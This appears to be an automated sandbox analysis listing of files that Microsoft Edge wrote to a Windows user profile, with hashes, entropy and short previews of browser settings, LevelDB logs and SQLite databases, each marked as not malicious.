Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379753431743412","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\91f7d915-1470-4f30-a771-aee0f13b9342.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9d71a69c-0cf8-4d2b-820f-218bdeafd14d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40504
Entropy (8bit):	5.561372911006949
Encrypted:	false
SSDEEP:	768:2fjDyjDhye7pLGLhKjDkWPimDHfw8DB8F1+UoAYDCx9Tuqh0VfUC9xbog/OVwDx9:2bGNyechmwWPHLfvdu1jaFDxjB+ChzIG
MD5:	F3EFBB260C76ACCA9763459A47623211
SHA1:	4685104C8C47EDF364187E605ACFE396144DEABF
SHA-256:	E5125FD752497A96914ACE74E6B49592F47B72D6FC71DED17E6DEF68655DC07A
SHA-512:	EE4806E542A0EA7BCC0218DA99B75507B7FA87302B108A45C2E95A7BE9FFD44AFFF7AE140A25F27AB63DDE8D9B12BF697D6E156E11BDDE36344133F9AB865E76
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379753431098420","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379753431098420","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	3.5394429593752084
Encrypted:	false
SSDEEP:	3:iWstvhYNrkUn:iptAd
MD5:	F27314DD366903BBC6141EAE524B0FDE
SHA1:	4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
SHA-256:	68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
SHA-512:	07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
Malicious:	false
Preview:	...m.................DB_VERSION.1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	307
Entropy (8bit):	5.21648902825117
Encrypted:	false
SSDEEP:	6:BEqZK1923oH+Tcwtp3hBtB2KLl3EoiN+q2P923oH+Tcwtp3hBWsIFUv:BH1Yebp3dFLp1v4Yebp3eFUv
MD5:	C09E2C2CBE967A544DA39543E9126403
SHA1:	5A05E9B2C64BA6925778270EBF9B75FBB7347C52
SHA-256:	6FD86771DDBA89359CF6B8D0F78178A7A3A3E01AB12BA9D26581BC17C1C42BEF
SHA-512:	85475C7B795B282CE4F06C29A6273317BA946EFE2AE68FF5CD7D8B67F2B4EF6F147FF6CD8F72225B8D5A13B5E1A147A8B90EF1B25A1FF90474752F202A746244
Malicious:	false
Preview:	2024/12/27-01:10:36.460 a08 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/27-01:10:36.608 a08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	2163821
Entropy (8bit):	5.222852116065196
Encrypted:	false
SSDEEP:	24576:v+/PN8FPfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN8Bfx2mjF
MD5:	760FE7A652DD052304E74E79D62FBEA3
SHA1:	3154EC77A91591BE3D444065307514225D44FC88
SHA-256:	B455C0CC40C095BE9D52154AB85BF089C9D687BDC36B34004C6C3A53CB5AB359
SHA-512:	27E6DDD3A3C79AE87C330A0C794229BF211DA31D86224B5BA1EF023C3FEA25C831B5E0AFC4B83904DD246C8A0453DBF05F90ECA04D35997AB7AF75A8A7391171
Malicious:	false
Preview:	...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4...13340900604462938.$QUERY:arbitration_priority_list4....[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.103809742259034
Encrypted:	false
SSDEEP:	6:BEqSLq2P923oH+Tcwt9Eh1tIFUt8UEqBgZmw+UEqRzkwO923oH+Tcwt9Eh15LJ:BH2v4Yeb9Eh16FUt8UHC/+UHR5LYeb9O
MD5:	16873A1CBFD387629FCD2E4D3D4C44EA
SHA1:	4086836FB3EF0FCC382F7E885B822059B2FA2814
SHA-256:	0715E8A7B4AB080D1EC132B10B1AD72374A92687D25622302217B0AB2C49EDD6
SHA-512:	52A97E670D50DA093DDC93AC757C4D0A9746EAF588A5F8D4F7102A7C3B751887CB3360EA58A4271FC574EA961DBEACB0ABC30D5F1F6A9FA44CAE2A38AC96666B
Malicious:	false
Preview:	2024/12/27-01:10:36.423 1c70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/27-01:10:36.424 1c70 Recovering log #3.2024/12/27-01:10:36.452 1c70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.103809742259034
Encrypted:	false
SSDEEP:	6:BEqSLq2P923oH+Tcwt9Eh1tIFUt8UEqBgZmw+UEqRzkwO923oH+Tcwt9Eh15LJ:BH2v4Yeb9Eh16FUt8UHC/+UHR5LYeb9O
MD5:	16873A1CBFD387629FCD2E4D3D4C44EA
SHA1:	4086836FB3EF0FCC382F7E885B822059B2FA2814
SHA-256:	0715E8A7B4AB080D1EC132B10B1AD72374A92687D25622302217B0AB2C49EDD6
SHA-512:	52A97E670D50DA093DDC93AC757C4D0A9746EAF588A5F8D4F7102A7C3B751887CB3360EA58A4271FC574EA961DBEACB0ABC30D5F1F6A9FA44CAE2A38AC96666B
Malicious:	false
Preview:	2024/12/27-01:10:36.423 1c70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/27-01:10:36.424 1c70 Recovering log #3.2024/12/27-01:10:36.452 1c70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.46287902507646633
Encrypted:	false
SSDEEP:	24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu5M:TouQq3qh7z3bY2LNW9WMcUvBuC
MD5:	34EEA65992C51760C21F96540C95723C
SHA1:	991214DE82D0B247E8F04F04D3EA748C87551FBB
SHA-256:	A8AD77FB54221A4BC1E61F8CDFFCC928F2602F392FAFE7EFA3666BB469D43167
SHA-512:	AE75BA2A383E205C8C91C38BC8830E8204132BE74B296052397ACFC550DCB59521557926A38942FEA4C6579172D77AE8361B4F5D854D19D6081D0951AC133328
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	0.8708334089814068
Encrypted:	false
SSDEEP:	12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
MD5:	92F9F7F28AB4823C874D79EDF2F582DE
SHA1:	2D4F1B04C314C79D76B7FF3F50056ECA517C338B
SHA-256:	6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
SHA-512:	86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	345
Entropy (8bit):	5.141420612414038
Encrypted:	false
SSDEEP:	6:BEuZpQWM+q2P923oH+TcwtnG2tMsIFUt8UEObG1Zmw+UEObQWMVkwO923oH+Tcwj:B1pQ+v4Yebn9GFUt8UjG1/+UjQV5LYeV
MD5:	F75A266C5F237705CED0D12D702C8339
SHA1:	C3B35C05822C3E283A0F73D3E8B41F8A8492C7E2
SHA-256:	9B9E60094AD700C2F066747405A714E16DAADF1F5C5789B689CEEEE60A44349B
SHA-512:	85D1F91FBCCB52530F03E8E8702D1A1DD7EBB3FABD4270373514978AE4684FC6B3DF85C65CC3BB4DFF49D1335335A6001CC6638E5966E27928B60B8FA9F5EF57
Malicious:	false
Preview:	2024/12/27-01:10:31.300 7ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/27-01:10:31.326 7ac Recovering log #3.2024/12/27-01:10:31.326 7ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	345
Entropy (8bit):	5.141420612414038
Encrypted:	false
SSDEEP:	6:BEuZpQWM+q2P923oH+TcwtnG2tMsIFUt8UEObG1Zmw+UEObQWMVkwO923oH+Tcwj:B1pQ+v4Yebn9GFUt8UjG1/+UjQV5LYeV
MD5:	F75A266C5F237705CED0D12D702C8339
SHA1:	C3B35C05822C3E283A0F73D3E8B41F8A8492C7E2
SHA-256:	9B9E60094AD700C2F066747405A714E16DAADF1F5C5789B689CEEEE60A44349B
SHA-512:	85D1F91FBCCB52530F03E8E8702D1A1DD7EBB3FABD4270373514978AE4684FC6B3DF85C65CC3BB4DFF49D1335335A6001CC6638E5966E27928B60B8FA9F5EF57
Malicious:	false
Preview:	2024/12/27-01:10:31.300 7ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/27-01:10:31.326 7ac Recovering log #3.2024/12/27-01:10:31.326 7ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6130289795203813
Encrypted:	false
SSDEEP:	12:TLs9pRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWgblMMAq2be:TLapR+DDNzWjJ0npnyXKUO8+jJyp3JmL
MD5:	BE1BC57B30FFB3F6F234C2DB57A0581E
SHA1:	E9811ED1029282FEB1AFC0F89D59DCA2A48F57CB
SHA-256:	24CA7AE78FA842E2D688971D4CB2FC0CD2D2E57487D9428B9D7071CE7463B7C8
SHA-512:	92C8AD9A64290F65DB2857C18FB1FD95385205F659326AEF44B4FFD024C33A958665BA0DF767533754C2B6F4E93E6A5D87F0364C3FEBAF57842F86948F90341D
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	375520
Entropy (8bit):	5.354123145753363
Encrypted:	false
SSDEEP:	6144:JA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:JFdMyq49tEndBuHltBfdK5WNbsVEziPU
MD5:	75818466129B923426A2B55A57A94B0B
SHA1:	BB9C1AA902297855C89DF46903E6F049CEC1CF3F
SHA-256:	BFC7B5D54FFB2EA58D693BAE47927BBED2FF16FEB4E473EBE8F07A4E1AFC4D33
SHA-512:	29307A3F6C114C0E73F8BFF35B209548B686E793C043DC05AE3F72E3D6E57A8F8675FDD2F8CE3074D3C23DEA86B48605BDB54BE33F8C68DD47D996853465DD66
Malicious:	false
Preview:	...m.................DB_VERSION.1.N.Wq...............&QUERY_TIMESTAMP:domains_config_gz2...13379753439413433..QUERY:domains_config_gz2....[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	311
Entropy (8bit):	5.178437603306547
Encrypted:	false
SSDEEP:	6:BEqZdM1923oH+Tcwtk2WwnvB2KLl3EwMq2P923oH+Tcwtk2WwnvIFUv:BHXhYebkxwnvFLp2v4YebkxwnQFUv
MD5:	FB5F7F68ED397682CD7ED22ED463DAA9
SHA1:	831FBAEF084FDD51A7F9C4058A051705430BE2AC
SHA-256:	AB149CB355EBAC7887BA7549078C772434BFCB9FD3DB2831F9F209DC2CDA1A9D
SHA-512:	C53405BDE376C817C1527E4CB8BD392DE36710B0B29917432FE352F38518B8C4653EE2A93882549781F2F1E9AEB438ED776485902B750B99C6E0626FE54FC4C3
Malicious:	false
Preview:	2024/12/27-01:10:36.460 1c94 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/27-01:10:36.519 1c94 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	358859
Entropy (8bit):	5.324608676412224
Encrypted:	false
SSDEEP:	6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RL:C1gAg1zfvz
MD5:	A8B092709E4B2406D14CB264765AE782
SHA1:	7A9D653A71CF5F5D0C779B945287A5233411EEA6
SHA-256:	60877AAC6C7DCA6705AB333DAE399A3F40CBBCCD86ADC66AE91213B3A75B4430
SHA-512:	8551C816F7877550FCCD7E4133A0DF4145B704127F238D5A94CE629D2CABEC96E70FEECB9FF0AA9C3983245177498ADD7D452396306DCFE25ACE3D79238B9B95
Malicious:	false
Preview:	{"aee_config":{"ar":{"price_regex":{"ae":"(((ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)))","dz":"(((dzd\|da\|\\x{062F}\\x{062C})\\s\\d{1,3})\|(\\d{1,3}\\s(dzd\|da\|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}\|egp)\\s\\d{1,3})\|(\\d{1,3}\\s(e\\x{00a3}\|egp)))","ma":"(((mad\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(mad\|dhs\|dh)))","sa":"((\\d{1,3}\\s(sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633}))\|((sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633})\\s\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})\|(\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})\|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})\|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.134685340933632
Encrypted:	false
SSDEEP:	6:BEq+cpQL+q2P923oH+Tcwt8aPrqIFUt8UEiSG1Zmw+UELQLVkwO923oH+Tcwt8a4:BW+v4YebL3FUt8UT11/+U1V5LYebQJ
MD5:	86803E897B91C4FF49CEDC7C851B39DB
SHA1:	61A196DB241B3287BD2BB50B5A5FC2161AAFE87E
SHA-256:	949BD9BAD0D260DFEFE4C62571EDFF5E006E227713D210F400706C599FE1FA33
SHA-512:	F173BDDEF44C2326E2C5C52631BBA5C10173327D30227FAA8EBF50DB773D2E84AF5B7045BB99BCC5E928A009DB6613422B0070E81ABF5D0BC9E0556143A9A826
Malicious:	false
Preview:	2024/12/27-01:10:31.304 a9c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/27-01:10:31.334 a9c Recovering log #3.2024/12/27-01:10:31.354 a9c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

